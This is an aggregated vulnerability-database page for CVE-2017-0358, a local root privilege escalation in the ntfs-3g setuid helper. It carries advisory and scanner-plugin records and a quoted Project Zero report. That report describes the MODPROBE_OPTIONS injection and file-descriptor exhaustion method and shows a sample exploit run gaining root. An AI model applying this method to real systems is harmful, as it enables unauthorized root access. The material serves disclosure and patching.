Vulnerabilities > CVE-2017-0358 - Improper Privilege Management vulnerability in multiple products
Attack vector
LOCAL Attack complexity
LOW Privileges required
LOW Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Restful Privilege Elevation Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.
Exploit-Db
file exploits/linux/local/41356.txt id EDB-ID:41356 last seen 2018-11-30 modified 2017-02-14 platform linux port published 2017-02-14 reporter Exploit-DB source https://www.exploit-db.com/download/41356 title ntfs-3g - Unsanitized modprobe Environment Privilege Escalation type local description ntfs-3g (Debian 9) - Privilege Escalation. CVE-2017-0358. Local exploit for Linux platform file exploits/linux/local/41240.sh id EDB-ID:41240 last seen 2017-02-04 modified 2017-02-03 platform linux port published 2017-02-03 reporter Exploit-DB source https://www.exploit-db.com/download/41240/ title ntfs-3g (Debian 9) - Privilege Escalation type local
Metasploit
| description | ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe. This can be abused to load a kernel module and execute a binary payload as the root user. |
| id | MSF:EXPLOIT/LINUX/LOCAL/NTFS3G_PRIV_ESC |
| last seen | 2020-06-08 |
| modified | 2018-10-10 |
| published | 2017-02-26 |
| references | |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/ntfs3g_priv_esc.rb |
| title | Debian/Ubuntu ntfs-3g Local Privilege Escalation |
Nessus
NASL family SuSE Local Security Checks NASL id SUSE_SU-2018-3587-1.NASL description This update for ntfs-3g_ntfsprogs fixes the following issues : CVE-2017-0358: Missing sanitization of the environment during a call to modprobe allowed local users to escalate fo root privilege (bsc#1022500) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 118587 published 2018-11-01 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/118587 title SUSE SLED12 Security Update : ntfs-3g_ntfsprogs (SUSE-SU-2018:3587-1) NASL family Debian Local Security Checks NASL id DEBIAN_DLA-815.NASL description Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation. For Debian 7 last seen 2020-03-17 modified 2017-02-03 plugin id 96963 published 2017-02-03 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96963 title Debian DLA-815-1 : ntfs-3g security update NASL family SuSE Local Security Checks NASL id OPENSUSE-2018-1376.NASL description This update for ntfs-3g_ntfsprogs fixes the following issues : - CVE-2017-0358: Missing sanitization of the environment during a call to modprobe allowed local users to escalate fo root privilege (bsc#1022500) This update was imported from the SUSE:SLE-12:Update update project. last seen 2020-06-05 modified 2018-11-10 plugin id 118874 published 2018-11-10 reporter This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/118874 title openSUSE Security Update : ntfs-3g_ntfsprogs (openSUSE-2018-1376) NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-3182-1.NASL description Jann Horn discovered that NTFS-3G incorrectly filtered environment variables when using the modprobe utility. A local attacker could possibly use this issue to load arbitrary kernel modules. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 96951 published 2017-02-02 reporter Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96951 title Ubuntu 16.04 LTS / 16.10 : ntfs-3g vulnerability (USN-3182-1) NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201702-10.NASL description The remote host is affected by the vulnerability described in GLSA-201702-10 (NTFS-3G: Privilege escalation) The NTFS-3G driver does not properly clear environment variables before invoking mount or umount. This flaw is similar to the vulnerability described in “GLSA-201701-19” and “GLSA-201603-04” referenced below but is now implemented in the NTFS-3G driver itself. Impact : A local user could gain root privileges. Workaround : There is no known workaround at this time. However, on Gentoo when the “suid” USE flag is not set (which is the default) an attacker cannot exploit the flaw. last seen 2020-06-01 modified 2020-06-02 plugin id 97253 published 2017-02-21 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97253 title GLSA-201702-10 : NTFS-3G: Privilege escalation NASL family SuSE Local Security Checks NASL id SUSE_SU-2018-3587-2.NASL description This update for ntfs-3g_ntfsprogs fixes the following issues : CVE-2017-0358: Missing sanitization of the environment during a call to modprobe allowed local users to escalate fo root privilege (bsc#1022500) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 119672 published 2018-12-14 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/119672 title SUSE SLED12 Security Update : ntfs-3g_ntfsprogs (SUSE-SU-2018:3587-2) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-3780.NASL description Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation. last seen 2020-06-01 modified 2020-06-02 plugin id 96933 published 2017-02-02 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96933 title Debian DSA-3780-1 : ntfs-3g - security update
Packetstorm
| data source | https://packetstormsecurity.com/files/download/141882/ntfs3g_priv_esc.rb.txt |
| id | PACKETSTORM:141882 |
| last seen | 2017-04-10 |
| published | 2017-04-04 |
| reporter | h00die |
| source | https://packetstormsecurity.com/files/141882/Debian-Ubuntu-ntfs-3g-Local-Privilege-Escalation.html |
| title | Debian/Ubuntu ntfs-3g Local Privilege Escalation |
Seebug
| bulletinFamily | exploit |
| description | Source: [https://bugs.chromium.org/p/project-zero/issues/detail?id=1072](https://bugs.chromium.org/p/project-zero/issues/detail?id=1072) ntfs-3g is installed by default e.g. on Ubuntu and comes with a setuid root program /bin/ntfs-3g. When this program is invoked on a system whose kernel does not support FUSE filesystems (detected by get_fuse_fstype()), ntfs-3g attempts to load the "fuse" module using /sbin/modprobe via load_fuse_module(). The issue is that /sbin/modprobe is not designed to run in a setuid context. As the manpage of modprobe explicitly points out: The MODPROBE_OPTIONS environment variable can also be used to pass arguments to modprobe. Therefore, on a system that does not seem to support FUSE filesystems, an attacker can set the environment variable MODPROBE_OPTIONS to something like "-C /tmp/evil_config -d /tmp/evil_root" to force modprobe to load its configuration and the module from attacker-controlled directories. This allows a local attacker to load arbitrary code into the kernel. In practice, the FUSE module is usually already loaded. However, the issue can still be attacked because a failure to open /proc/filesystems (meaning that get_fuse_fstype() returns FSTYPE_UNKNOWN) always causes modprobe to be executed, even if the FUSE module is already loaded. An attacker can cause an attempt to open /proc/filesystems to fail by exhausting the global limit on the number of open file descriptions (/proc/sys/fs/file-max). I have attached an exploit for the issue. I have tested it in a VM with Ubuntu Server 16.10. To reproduce, unpack the attached file, compile the exploit and run it: ```bash user@ubuntu:~$ tar xf ntfs-3g-modprobe-unsafe.tar user@ubuntu:~$ cd ntfs-3g-modprobe-unsafe/ user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./compile.sh make: Entering directory '/usr/src/linux-headers-4.8.0-32-generic' CC [M] /home/user/ntfs-3g-modprobe-unsafe/rootmod.o Building modules, stage 2. MODPOST 1 modules CC /home/user/ntfs-3g-modprobe-unsafe/rootmod.mod.o LD [M] /home/user/ntfs-3g-modprobe-unsafe/rootmod.ko make: Leaving directory '/usr/src/linux-headers-4.8.0-32-generic' depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.order: No such file or directory depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.builtin: No such file or directory user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./sploit looks like we won the race got ENFILE at 198088 total Failed to open /proc/filesystems: Too many open files in system yay, modprobe ran! modprobe: ERROR: ../libkmod/libkmod.c:514 lookup_builtin_file() could not open builtin file '/tmp/ntfs_sploit.u48sGO/lib/modules/4.8.0-32-generic/modules.builtin.bin' modprobe: ERROR: could not insert 'rootmod': Too many levels of symbolic links Error opening '/tmp/ntfs_sploit.u48sGO/volume': Is a directory Failed to mount '/tmp/ntfs_sploit.u48sGO/volume': Is a directory we have root privs now... root@ubuntu:~/ntfs-3g-modprobe-unsafe# id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lxd),123(libvirt),127(sambashare),128(lpadmin),1000(user) ``` Note: The exploit seems to work relatively reliably in VMs with multiple CPU cores, but not in VMs with a single CPU core. If you test this exploit in a VM, please ensure that the VM has at least two CPU cores. Proof of Concept:[https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41356.zip](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41356.zip) |
| id | SSV:92684 |
| last seen | 2017-11-19 |
| modified | 2017-02-15 |
| published | 2017-02-15 |
| reporter | Root |
| title | ntfs-3g - Unsanitized modprobe mention the right Vulnerability( CVE-2017-0358) |
References
- http://www.openwall.com/lists/oss-security/2017/02/04/1
- https://www.exploit-db.com/exploits/41356/
- https://www.exploit-db.com/exploits/41240/
- https://security.gentoo.org/glsa/201702-10
- https://marc.info/?l=oss-security&m=148594671929354&w=2
- http://www.securityfocus.com/bid/95987
- https://www.debian.org/security/2017/dsa-3780